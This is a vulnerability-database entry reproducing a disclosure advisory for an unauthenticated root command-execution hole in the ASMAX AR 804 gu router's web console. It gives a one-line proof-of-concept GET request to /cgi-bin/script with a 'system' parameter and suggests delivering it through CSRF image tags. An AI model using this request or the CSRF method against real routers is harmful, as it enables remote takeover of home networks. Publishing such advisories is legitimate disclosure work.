Vulners
Lucene search
ASMAX AR 804 gu Web Management Console Arbitrary Command Exec
=============================================================
ASMAX AR 804 gu Web Management Console Arbitrary Command Exec
=============================================================
1. ASMAX 804 gu router is a SOHO class device. It provides ADSL / WiFi / Ethernet interfaces.
2. There is an *unauthenticated* maintenance script (named 'script') in /cgi-bin/ directory of the web management interface.
3. When 'system' paramether is passed to the script it allows running OS shell commands (as root).
4. PoC:
GET request to:
http://192.168.1.1/cgi-bin/script?system%20whoami
Returns:
root
5. Using CSRF attack one could remotely own a router using for example simple <img> html tags pointing to http://192.168.1.1/...
6. The issue was tested on firmware: 66.34.1
7. The vendor was notified on 30.12.08, but we got no reasonable response till now (the bug remains unpatched).
# 0day.today [2018-02-20] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jun 2009 00:00Current
7.1High risk
Vulners AI Score7.1